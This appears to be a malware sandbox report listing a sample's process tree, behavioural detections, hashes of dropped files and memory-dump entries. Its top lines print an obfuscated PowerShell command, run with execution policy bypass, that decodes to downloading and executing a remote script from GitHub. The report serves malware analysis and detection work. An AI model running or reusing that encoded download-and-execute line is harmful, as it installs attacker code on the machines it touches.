C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.dllMD5
1c24fccd700bf0fc9d10819d2db40625
SHA1dc0142adf0d2dfd4838d2255ebd592c8d901be77
SHA256de03d70f8ef51e10f184b3114461724bbc6cfb697f91da7172230748265f18db
SHA512f3715bd41ed1fa264019ee77ec6ac7e788605fe486a5e33ffeb739dd023fd918febcfdaccc36d4c5fab08f4d414babdec17def5741599767ed281bbe1adeef33
-
C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmpMD5
8c582b2501b04000211837d30077873c
SHA1504c7866540324ef4082d3683d74d8382d2d1d58
SHA256e4a3f446d8d3fd93aa1d10665eca56cb37ef209eaf7efa8d568e10ba86cdd505
SHA512b0720dbbdbdfdae22c346f639a46b007dfc80601e78ca1f192f667504288c650bc62cd059783d42fd6199692e790ce29a18df54a89ec64ced3f245459f3d7e9b
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.cmdlineMD5
4d2c717f8c9dccae1c012d980eadb085
SHA15abb054fbc72e676a526ab1267a33fa27c641230
SHA256ae2b113ac0918d747f22646c5f335ee9e6a0e8b6a20e597468b2e4d273d8d52c
SHA5120f1d20220be9b73983be5cd0ee06aea8999c4df4d25b8ead93dfd4cce943810374be84e953df119c099bb5bf0aac8b519d7e3d73c7230f872e1bdff91e101ea7
-
\??\c:\Users\Admin\AppData\Local\Temp\5agdcg2t\CSC977694CB725A4BBD99B4E7E5B7F754.TMPMD5
17b80d4f73f621ff391dbfb359113ffd
SHA10fe86a6eb89c2eef3031388bca5e66a2128e042d
SHA25610f51f3ae842f8437484b052da6f0538769e373005fb75a0e18b3de380e40a17
SHA512043c7d0cee270e3b06299d3081aa78f578785d472a00552750e1ba2e41733285e8fe3b19c597203113d3677d390415aa5162c693df60dccb4f623b80a6379a57
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/268-10-0x0000000000000000-mapping.dmp
-
memory/268-55-0x0000000000000000-mapping.dmp
-
memory/308-1-0x0000000001480000-0x0000000001491000-memory.dmpFilesize
68KB
-
memory/308-0-0x0000000001140000-0x000000000147D000-memory.dmpFilesize
3.2MB
-
memory/432-38-0x0000000000000000-mapping.dmp
-
memory/688-61-0x0000000000000000-mapping.dmp
-
memory/688-85-0x0000000000000000-mapping.dmp
-
memory/760-45-0x0000000000000000-mapping.dmp
-
memory/796-62-0x0000000000000000-mapping.dmp
-
memory/912-72-0x0000000000000000-mapping.dmp
-
memory/912-60-0x0000000000000000-mapping.dmp
-
memory/916-67-0x0000000000000000-mapping.dmp
-
memory/920-66-0x0000000000000000-mapping.dmp
-
memory/944-49-0x0000000000000000-mapping.dmp
-
memory/948-95-0x00000000196A0000-0x00000000196A1000-memory.dmpFilesize
4KB
-
memory/948-97-0x00000000196D0000-0x00000000196D1000-memory.dmpFilesize
4KB
-
memory/948-78-0x000007FEF4EF0000-0x000007FEF58DC000-memory.dmpFilesize
9.9MB
-
memory/948-113-0x000000001AD90000-0x000000001AD91000-memory.dmpFilesize
4KB
-
memory/948-96-0x00000000196C0000-0x00000000196C1000-memory.dmpFilesize
4KB
-
memory/948-104-0x000000001A010000-0x000000001A011000-memory.dmpFilesize
4KB
-
memory/948-112-0x000000001AD70000-0x000000001AD71000-memory.dmpFilesize
4KB
-
memory/948-88-0x0000000000FE0000-0x0000000000FE1000-memory.dmpFilesize
4KB
-
memory/948-94-0x0000000019690000-0x0000000019691000-memory.dmpFilesize
4KB
-
memory/948-93-0x0000000001030000-0x0000000001031000-memory.dmpFilesize
4KB
-
memory/948-105-0x000000001ACE0000-0x000000001ACE1000-memory.dmpFilesize
4KB
-
memory/948-77-0x0000000000000000-mapping.dmp
-
memory/956-48-0x0000000000000000-mapping.dmp
-
memory/1008-83-0x0000000000000000-mapping.dmp
-
memory/1060-64-0x0000000000000000-mapping.dmp
-
memory/1060-43-0x0000000000000000-mapping.dmp
-
memory/1068-46-0x0000000000000000-mapping.dmp
-
memory/1072-69-0x0000000000000000-mapping.dmp
-
memory/1080-51-0x0000000000000000-mapping.dmp
-
memory/1164-13-0x0000000000000000-mapping.dmp
-
memory/1164-54-0x0000000000000000-mapping.dmp
-
memory/1224-65-0x0000000000000000-mapping.dmp
-
memory/1248-47-0x0000000000000000-mapping.dmp
-
memory/1292-44-0x0000000000000000-mapping.dmp
-
memory/1340-21-0x000000001C210000-0x000000001C211000-memory.dmpFilesize
4KB
-
memory/1340-6-0x0000000002460000-0x0000000002461000-memory.dmpFilesize
4KB
-
memory/1340-2-0x0000000000000000-mapping.dmp
-
memory/1340-35-0x000000001C250000-0x000000001C251000-memory.dmpFilesize
4KB
-
memory/1340-3-0x000007FEF4EF0000-0x000007FEF58DC000-memory.dmpFilesize
9.9MB
-
memory/1340-4-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
memory/1340-5-0x000000001ABC0000-0x000000001ABC1000-memory.dmpFilesize
4KB
-
memory/1340-34-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1340-7-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/1340-9-0x000000001B6C0000-0x000000001B6C1000-memory.dmpFilesize
4KB
-
memory/1340-17-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/1340-18-0x00000000026C0000-0x00000000026C1000-memory.dmpFilesize
4KB
-
memory/1340-33-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/1416-76-0x0000000000000000-mapping.dmp
-
memory/1420-36-0x0000000000000000-mapping.dmp
-
memory/1464-56-0x0000000000000000-mapping.dmp
-
memory/1540-39-0x0000000000000000-mapping.dmp
-
memory/1580-63-0x0000000000000000-mapping.dmp
-
memory/1580-40-0x0000000000000000-mapping.dmp
-
memory/1580-74-0x0000000000000000-mapping.dmp
-
memory/1624-57-0x0000000000000000-mapping.dmp
-
memory/1644-41-0x0000000000000000-mapping.dmp
-
memory/1648-52-0x0000000000000000-mapping.dmp
-
memory/1656-70-0x0000000000000000-mapping.dmp
-
memory/1656-50-0x0000000000000000-mapping.dmp
-
memory/1688-75-0x0000000000000000-mapping.dmp
-
memory/1688-42-0x0000000000000000-mapping.dmp
-
memory/1840-73-0x0000000000000000-mapping.dmp
-
memory/1936-53-0x0000000000000000-mapping.dmp